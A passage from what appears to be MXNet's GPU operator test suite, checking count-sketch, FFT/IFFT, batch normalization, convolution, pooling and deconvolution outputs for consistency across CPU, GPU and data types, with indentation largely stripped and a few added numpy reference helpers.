set_default_context(mx.gpu(0))
del test_support_vector_machine_l1_svm
del test_support_vector_machine_l2_svm
def check_countsketch(in_dim,out_dim,n):
sym = mx.sym.contrib.count_sketch(name='countsketch',out_dim = out_dim)
shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s
arr = [mx.nd.empty(shape[i]) for i in range(3)]
arr_grad = [mx.nd.empty(shape[i]) for i in range(3)]
x = np.random.uniform(-10, 10, shape[0])
arr[0][:] = x #input x
h = np.random.randint(0, out_dim, shape[1])
arr[1][:] = h #hash h
s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2])
arr[2][:] = s #hash s
# forward
exe_list = [sym.bind(mx.gpu(0), arr, arr_grad)]
for exe in exe_list:
exe.forward(is_train= True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
a = np.zeros((n,out_dim))
temp = np.multiply(x, s)
for num_sample in np.arange(0,n):
for idx in np.arange(0,in_dim):
a[num_sample][h[0][idx]] += temp[num_sample][idx]
assert_almost_equal(a,out1[0],rtol=1e-3, atol=1e-12)
# backward
out_grad = mx.nd.empty((n,out_dim))
out_grad[:] = np.random.normal(-3, 3, (n,out_dim))
for exe in exe_list:
exe.backward([out_grad])
a = np.zeros((n,in_dim))
for j in np.arange(0,n):
for i in np.arange(0,in_dim):
a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i]
assert_almost_equal(a,arr_grad[0].asnumpy(),rtol=1e-3, atol=1e-12)
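# Illustrative sketch (not part of the test suite): a plain-numpy reference for the
# count-sketch projection that check_countsketch verifies. Each input column i is
# multiplied by a random sign s[i] and accumulated into output bucket h[i]. Here h
# and s are assumed to be 1-D arrays of length in_dim (the test stores them with
# shape (1, in_dim)); nothing mxnet-specific is used.
def _count_sketch_reference(x, h, s, out_dim):
    import numpy as np
    n, in_dim = x.shape
    out = np.zeros((n, out_dim))
    for i in range(in_dim):
        out[:, int(h[i])] += s[i] * x[:, i]   # signed accumulation into bucket h[i]
    return out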
@with_seed(0)
def test_countsketch():
nrepeat = 2
minindim = 40
maxindim = 100
minoutdim = 5
maxoutdim = 30
maxn = 200
for repeat in range(nrepeat):
in_dim = np.random.randint(minindim, maxindim)
out_dim = np.random.randint(minoutdim, maxoutdim)
n = np.random.randint(1,maxn)
check_countsketch(in_dim, out_dim, n)
def check_ifft(shape):
shape_old = shape
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1]*2)
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1],shape[2],shape[3]*2)
sym = mx.sym.contrib.ifft(name='ifft', compute_size = 128)
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'ifft_data': shape, 'type_dict': {'ifft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train= True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
if len(shape) == 2:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[1]):
init_complex.real[:,i] = init[0][:,2*i]
init_complex.imag[:,i] = init[0][:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[1],rtol=1e-3, atol=1e-12)
if len(shape) == 4:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[3]):
init_complex.real[:,:,:,i] = init[0][:,:,:,2*i]
init_complex.imag[:,:,:,i] = init[0][:,:,:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[3],rtol=1e-3, atol=1e-12)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[1]):
temp[:,i] = exe.grad_arrays[0].asnumpy()[:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-12)
if len(shape) == 4:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[3]):
temp[:,:,:,i] = exe.grad_arrays[0].asnumpy()[:,:,:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-12)
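# Illustrative sketch (not part of the test suite): the de-interleaving that
# check_ifft performs on its input. The last axis stores complex numbers as
# [re0, im0, re1, im1, ...]; the contrib ifft operator is assumed (as in the
# assertions above) to return an unnormalized inverse DFT, which is why the test
# divides its output by the transform length before comparing with np.fft.ifft.
def _deinterleave_and_ifft(interleaved):
    import numpy as np
    z = interleaved[..., 0::2] + 1j * interleaved[..., 1::2]
    n = z.shape[-1]
    normalized = np.fft.ifft(z, axis=-1)      # includes numpy's 1/n factor
    unnormalized = normalized * n             # what an unnormalized operator would return
    return normalized, unnormalized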
@with_seed(0)
def test_ifft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_ifft(shape)
def check_fft(shape):
sym = mx.sym.contrib.fft(name='fft', compute_size = 128)
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
#forward
for exe in exe_list:
exe.forward(is_train=True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
out = np.fft.fft(init, n=None, axis=-1, norm=None)
if len(shape) == 2:
out = np.reshape(out,(out.shape[1],out.shape[2]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
p = 0
for i in range(out2.shape[1]//2):
a[:,p] = out2[:,i]
a[:,p+1] = out2[:,i+out2.shape[1]//2]
p = p+2
if len(shape) == 4:
out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
for i in range(out1[0].shape[0]):
for j in range(out1[0].shape[1]):
p = 0
for k in range(out2.shape[3]):
a[i,j,:,p] = out2[i,j,:,k]
a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k]
p = p+2
assert_almost_equal(a, out1[0],rtol=1e-3, atol=1e-6)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty((shape[0],2*shape[1]))
out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1]))
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[1]):
out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i]
out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[1],rtol=1e-3, atol=1e-8)
if len(shape) == 4:
out_grad = mx.nd.empty(out1[0].shape)
out_grad[:] = np.random.normal(-3, 3, out1[0].shape)
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[3]):
out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i]
out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[3],rtol=1e-3, atol=1e-6)
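# Illustrative sketch (not part of the test suite): building the interleaved
# [re0, im0, re1, im1, ...] layout along the last axis, which is the layout the
# loops in check_fft reconstruct from the operator output before comparing it
# against np.fft.fft.
def _interleave_complex(z):
    import numpy as np
    z = np.asarray(z)
    out = np.empty(z.shape[:-1] + (2 * z.shape[-1],), dtype=z.real.dtype)
    out[..., 0::2] = z.real
    out[..., 1::2] = z.imag
    return out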
@with_seed(0)
def test_fft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_fft(shape)
@with_seed()
def test_batchnorm_with_type():
ctx_list_v1_2D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
]
ctx_list_v2_2D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_1D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_3D = [
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}}
]
# V1, 2D
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=False)
check_consistency(sym, ctx_list_v1_2D)
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=True)
check_consistency(sym, ctx_list_v1_2D)
# V2, 2D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
# V2, 1D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
    # V2, 3D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
@with_seed()
def test_batchnorm_versions():
def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats):
ctx_list = []
sym_list = []
# BatchNormV1 cpu
if 'batchnorm_v1_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNormV1 gpu (organic)
if 'batchnorm_v1_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm cpu
if 'batchnorm_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm gpu (organic)
if 'batchnorm_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=True))
# BatchNorm gpu cudnn (if cudnn is enabled)
if 'batchnorm_cudnn' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=False))
check_consistency(sym_list, ctx_list)
def test_1d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 20)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_2d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 10, 10)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_v1_cpu', 'batchnorm_v1_gpu',
'batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_3d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 3, 5, 5)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
test_1d_batchnorm(True, False)
test_1d_batchnorm(False, False)
test_1d_batchnorm(False, True)
test_1d_batchnorm(True, True)
test_2d_batchnorm(True, False)
test_2d_batchnorm(False, False)
test_2d_batchnorm(False, True)
test_2d_batchnorm(True, True)
test_3d_batchnorm(True, False)
test_3d_batchnorm(False, False)
test_3d_batchnorm(False, True)
test_3d_batchnorm(True, True)
@with_seed(1234)
def test_convolution_with_type():
sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv')
data = mx.sym.Variable('conv_data')
w = mx.sym.Variable('conv_weight')
b = mx.sym.Variable('conv_bias')
w = mx.sym.transpose(w, axes=(0,2,3,1))
sym2 = mx.sym.transpose(data, axes=(0,2,3,1))
sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3))
sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv')
sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2]
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
# NHWC
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}}
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, tol=tol)
# Apply N symbols against each of M contexts, checking that all NxM combinations match.
def check_consistency_NxM(sym_list, ctx_list):
# e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are:
# sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3]
check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list))
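# Illustrative sketch (not part of the test suite): the sym/ctx pairing built by
# check_consistency_NxM, written with plain lists so the expansion is explicit.
# With sym_list=[s1, s2] and ctx_list=[c1, c2, c3], all 2x3 combinations appear.
def _nxm_pairs(sym_list, ctx_list):
    expanded_syms = [s for s in sym_list for _ in ctx_list]   # s1,s1,s1,s2,s2,s2
    expanded_ctxs = ctx_list * len(sym_list)                  # c1,c2,c3,c1,c2,c3
    return list(zip(expanded_syms, expanded_ctxs))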
@with_seed()
def test_convolution_options():
# 1D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 3D convolution
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed()
def test_convolution_versions():
# 2D convolution NCHW
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# 3D convolution NCDHW
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
syms = [conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
@with_seed()
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool')
check_consistency(sym, ctx_list)
@with_seed()
def test_deconvolution_with_type():
# Test basic deconvolution without exercising stride, pad or dilation.
# 1D deconvolution
sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
# 2D deconvolution
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
@with_seed()
def test_deconvolution_options():
# 1D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv')
